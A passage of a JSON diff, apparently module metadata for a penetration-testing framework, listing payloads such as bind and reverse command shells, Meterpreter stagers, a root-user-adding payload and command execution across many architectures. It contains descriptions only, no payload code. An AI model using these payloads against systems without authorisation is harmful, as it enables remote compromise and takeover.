"disclosure_date": null, + "type": "payload", + "author": [ + "skape " + ], + "description": "Listen for a connection and spawn a command shell", + "references": [], + "platform": "All", + "arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, java, ruby, dalvik, python, nodejs, firefox, zarch, r, riscv32be, riscv32le, riscv64be, riscv64le, loongarch64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/generic/shell_bind_tcp.rb", + "is_install_path": true, + "ref_name": "generic/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_generic/shell_reverse_tcp": { + "name": "Generic Command Shell, Reverse TCP Inline", + "fullname": "payload/generic/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape " + ], + "description": "Connect back to attacker and spawn a command shell", + "references": [], + "platform": "All", + "arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, java, ruby, dalvik, python, nodejs, firefox, zarch, r, riscv32be, riscv32le, riscv64be, riscv64le, loongarch64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/generic/shell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "generic/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_generic/ssh/interact": { + "name": "Interact with Established SSH Connection", + "fullname": "payload/generic/ssh/interact", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre" + ], + "description": "Interacts with a shell on an established SSH connection", + "references": [], + "platform": "All", + "arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, tty, java, ruby, dalvik, python, nodejs, firefox, zarch, r, riscv32be, riscv32le, riscv64be, riscv64le, loongarch64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-07-24 16:42:43 +0000", + "path": "/modules/payloads/singles/generic/ssh/interact.rb", + "is_install_path": true, + "ref_name": "generic/ssh/interact", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_generic/tight_loop": { + "name": "Generic x86 Tight Loop", + "fullname": "payload/generic/tight_loop", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "jduck " + ], + "description": "Generate a tight loop in the target process", + "references": [], + "platform": "BSD,BSDi,Linux,OSX,Solaris,Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/generic/tight_loop.rb", + "is_install_path": true, + "ref_name": "generic/tight_loop", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_java/jsp_shell_bind_tcp": { + "name": "Java JSP Command Shell, Bind TCP Inline", + "fullname": "payload/java/jsp_shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf " + ], + "description": "Listen for a connection and spawn a command shell", + "references": [], + "platform": "Linux,OSX,Solaris,Unix,Windows", + "arch": "java", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/java/jsp_shell_bind_tcp.rb", + "is_install_path": true, + "ref_name": "java/jsp_shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_java/jsp_shell_reverse_tcp": { + "name": "Java JSP Command Shell, Reverse TCP Inline", + "fullname": "payload/java/jsp_shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf " + ], + "description": "Connect back to attacker and spawn a command shell", + "references": [], + "platform": "Linux,OSX,Solaris,Unix,Windows", + "arch": "java", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/java/jsp_shell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "java/jsp_shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_java/meterpreter/bind_tcp": { + "name": "Java Meterpreter, Java Bind TCP Stager", + "fullname": "payload/java/meterpreter/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "mihi", + "egypt ", + "OJ Reeves" + ], + "description": "Run a meterpreter server in Java.\n\nListen for a connection", + "references": [], + "platform": "Java", + "arch": "java", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/java/bind_tcp.rb", + "is_install_path": true, + "ref_name": "java/meterpreter/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "java/meterpreter", + "stager_refname": "java/bind_tcp" + }, + "payload_java/meterpreter/reverse_http": { + "name": "Java Meterpreter, Java Reverse HTTP Stager", + "fullname": "payload/java/meterpreter/reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "mihi", + "egypt ", + "OJ Reeves", + "hdm " + ], + "description": "Run a meterpreter server in Java.\n\nTunnel communication over HTTP", + "references": [], + "platform": "Java", + "arch": "java", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/java/reverse_http.rb", + "is_install_path": true, + "ref_name": "java/meterpreter/reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "java/meterpreter", + "stager_refname": "java/reverse_http" + }, + "payload_java/meterpreter/reverse_https": { + "name": "Java Meterpreter, Java Reverse HTTPS Stager", + "fullname": "payload/java/meterpreter/reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "mihi", + "egypt ", + "OJ Reeves", + "hdm " + ], + "description": "Run a meterpreter server in Java.\n\nTunnel communication over HTTPS", + "references": [], + "platform": "Java", + "arch": "java", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/java/reverse_https.rb", + "is_install_path": true, + "ref_name": "java/meterpreter/reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "java/meterpreter", + "stager_refname": "java/reverse_https" + }, + "payload_java/meterpreter/reverse_tcp": { + "name": "Java Meterpreter, Java Reverse TCP Stager", + "fullname": "payload/java/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "mihi", + "egypt ", + "OJ Reeves" + ], + "description": "Run a meterpreter server in Java.\n\nConnect back stager", + "references": [], + "platform": "Java", + "arch": "java", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/java/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "java/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "java/meterpreter", + "stager_refname": "java/reverse_tcp" + }, + "payload_java/shell/bind_tcp": { + "name": "Command Shell, Java Bind TCP Stager", + "fullname": "payload/java/shell/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "mihi", + "egypt " + ], + "description": "Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else).\n\nListen for a connection", + "references": [], + "platform": "Java", + "arch": "java", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/java/bind_tcp.rb", + "is_install_path": true, + "ref_name": "java/shell/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "java/shell", + "stager_refname": "java/bind_tcp" + }, + "payload_java/shell/reverse_tcp": { + "name": "Command Shell, Java Reverse TCP Stager", + "fullname": "payload/java/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "mihi", + "egypt " + ], + "description": "Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else).\n\nConnect back stager", + "references": [], + "platform": "Java", + "arch": "java", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/java/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "java/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "java/shell", + "stager_refname": "java/reverse_tcp" + }, + "payload_java/shell_reverse_tcp": { + "name": "Java Command Shell, Reverse TCP Inline", + "fullname": "payload/java/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "mihi", + "egypt " + ], + "description": "Connect back to attacker and spawn a command shell", + "references": [], + "platform": "Java", + "arch": "java", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/java/shell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "java/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/aarch64/meterpreter/reverse_tcp": { + "name": "Linux Meterpreter, Reverse TCP Stager", + "fullname": "payload/linux/aarch64/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack " + ], + "description": "Inject the mettle server payload (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "aarch64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "linux/aarch64/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/aarch64/meterpreter", + "stager_refname": "linux/aarch64/reverse_tcp" + }, + "payload_linux/aarch64/meterpreter_reverse_http": { + "name": "Linux Meterpreter, Reverse HTTP Inline", + "fullname": "payload/linux/aarch64/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "aarch64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb", + "is_install_path": true, + "ref_name": "linux/aarch64/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/aarch64/meterpreter_reverse_https": { + "name": "Linux Meterpreter, Reverse HTTPS Inline", + "fullname": "payload/linux/aarch64/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "aarch64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb", + "is_install_path": true, + "ref_name": "linux/aarch64/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/aarch64/meterpreter_reverse_tcp": { + "name": "Linux Meterpreter, Reverse TCP Inline", + "fullname": "payload/linux/aarch64/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "aarch64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "linux/aarch64/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/aarch64/shell/reverse_tcp": { + "name": "Linux dup2 Command Shell, Reverse TCP Stager", + "fullname": "payload/linux/aarch64/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [], + "description": "dup2 socket in x12, then execve.\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "aarch64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "linux/aarch64/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/aarch64/shell", + "stager_refname": "linux/aarch64/reverse_tcp" + }, + "payload_linux/aarch64/shell_reverse_tcp": { + "name": "Linux Command Shell, Reverse TCP Inline", + "fullname": "payload/linux/aarch64/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [], + "description": "Connect back to attacker and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "aarch64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/aarch64/shell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "linux/aarch64/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/armbe/meterpreter_reverse_http": { + "name": "Linux Meterpreter, Reverse HTTP Inline", + "fullname": "payload/linux/armbe/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "armbe", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb", + "is_install_path": true, + "ref_name": "linux/armbe/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/armbe/meterpreter_reverse_https": { + "name": "Linux Meterpreter, Reverse HTTPS Inline", + "fullname": "payload/linux/armbe/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "armbe", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb", + "is_install_path": true, + "ref_name": "linux/armbe/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/armbe/meterpreter_reverse_tcp": { + "name": "Linux Meterpreter, Reverse TCP Inline", + "fullname": "payload/linux/armbe/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "armbe", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "linux/armbe/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/armbe/shell_bind_tcp": { + "name": "Linux ARM Big Endian Command Shell, Bind TCP Inline", + "fullname": "payload/linux/armbe/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Balazs Bucsay @xoreipeip " + ], + "description": "Listen for a connection and spawn a command shell", + "references": [ + "URL-https://github.com/earthquake/shellcodes/blob/master/armeb_linux_ipv4_bind_tcp.s" + ], + "platform": "Linux", + "arch": "armbe", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/armbe/shell_bind_tcp.rb", + "is_install_path": true, + "ref_name": "linux/armbe/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/armle/adduser": { + "name": "Linux Add User", + "fullname": "payload/linux/armle/adduser", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Jonathan Salwan" + ], + "description": "Create a new user with UID 0", + "references": [], + "platform": "Linux", + "arch": "armle", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/armle/adduser.rb", + "is_install_path": true, + "ref_name": "linux/armle/adduser", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/armle/exec": { + "name": "Linux Execute Command", + "fullname": "payload/linux/armle/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Jonathan Salwan" + ], + "description": "Execute an arbitrary command", + "references": [], + "platform": "Linux", + "arch": "armle", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/armle/exec.rb", + "is_install_path": true, + "ref_name": "linux/armle/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/armle/meterpreter/bind_tcp": { + "name": "Linux Meterpreter, Bind TCP Stager", + "fullname": "payload/linux/armle/meterpreter/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "nemo " + ], + "description": "Inject the mettle server payload (staged).\n\nListen for a connection", + "references": [], + "platform": "Linux", + "arch": "armle", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/linux/armle/bind_tcp.rb", + "is_install_path": true, + "ref_name": "linux/armle/meterpreter/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/armle/meterpreter", + "stager_refname": "linux/armle/bind_tcp" + }, + "payload_linux/armle/meterpreter/reverse_tcp": { + "name": "Linux Meterpreter, Reverse TCP Stager", + "fullname": "payload/linux/armle/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "nemo ", + "tkmru" + ], + "description": "Inject the mettle server payload (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "armle", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/linux/armle/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "linux/armle/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/armle/meterpreter", + "stager_refname": "linux/armle/reverse_tcp" + }, + "payload_linux/armle/meterpreter_reverse_http": { + "name": "Linux Meterpreter, Reverse HTTP Inline", + "fullname": "payload/linux/armle/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "armle", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb", + "is_install_path": true, + "ref_name": "linux/armle/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/armle/meterpreter_reverse_https": { + "name": "Linux Meterpreter, Reverse HTTPS Inline", + "fullname": "payload/linux/armle/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "armle", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb", + "is_install_path": true, + "ref_name": "linux/armle/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/armle/meterpreter_reverse_tcp": { + "name": "Linux Meterpreter, Reverse TCP Inline", + "fullname": "payload/linux/armle/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "armle", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "linux/armle/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/armle/shell/bind_tcp": { + "name": "Linux dup2 Command Shell, Bind TCP Stager", + "fullname": "payload/linux/armle/shell/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "nemo " + ], + "description": "dup2 socket in r12, then execve.\n\nListen for a connection", + "references": [], + "platform": "Linux", + "arch": "armle", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/linux/armle/bind_tcp.rb", + "is_install_path": true, + "ref_name": "linux/armle/shell/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/armle/shell", + "stager_refname": "linux/armle/bind_tcp" + }, + "payload_linux/armle/shell/reverse_tcp": { + "name": "Linux dup2 Command Shell, Reverse TCP Stager", + "fullname": "payload/linux/armle/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "nemo ", + "tkmru" + ], + "description": "dup2 socket in r12, then execve.\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "armle", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/linux/armle/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "linux/armle/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/armle/shell", + "stager_refname": "linux/armle/reverse_tcp" + }, + "payload_linux/armle/shell_bind_tcp": { + "name": "Linux Command Shell, Reverse TCP Inline", + "fullname": "payload/linux/armle/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "civ", + "hal" + ], + "description": "Connect to target and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "armle", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/armle/shell_bind_tcp.rb", + "is_install_path": true, + "ref_name": "linux/armle/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/armle/shell_reverse_tcp": { + "name": "Linux Command Shell, Reverse TCP Inline", + "fullname": "payload/linux/armle/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "civ" + ], + "description": "Connect back to attacker and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "armle", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/armle/shell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "linux/armle/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/mips64/meterpreter_reverse_http": { + "name": "Linux Meterpreter, Reverse HTTP Inline", + "fullname": "payload/linux/mips64/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "mips64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb", + "is_install_path": true, + "ref_name": "linux/mips64/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/mips64/meterpreter_reverse_https": { + "name": "Linux Meterpreter, Reverse HTTPS Inline", + "fullname": "payload/linux/mips64/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "mips64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb", + "is_install_path": true, + "ref_name": "linux/mips64/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/mips64/meterpreter_reverse_tcp": { + "name": "Linux Meterpreter, Reverse 